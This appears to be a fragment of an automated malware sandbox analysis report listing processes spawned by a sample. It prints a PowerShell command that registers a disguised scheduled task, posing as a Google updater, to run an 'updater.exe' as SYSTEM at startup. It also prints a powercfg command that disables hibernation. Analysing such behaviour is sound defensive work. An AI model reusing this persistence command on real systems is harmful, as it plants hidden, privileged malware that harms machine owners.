                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                            Imagebase:0x7ff60ef50000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:55
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff60ef50000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:56
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\powercfg.exe
                            Wow64 process (32bit):false
                            Commandline:powercfg /x -hibernate-timeout-dc 0
                            Imagebase:0x7ff7bfb70000
                            File size:96'256 bytes
                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Disassembly

                            No disassembly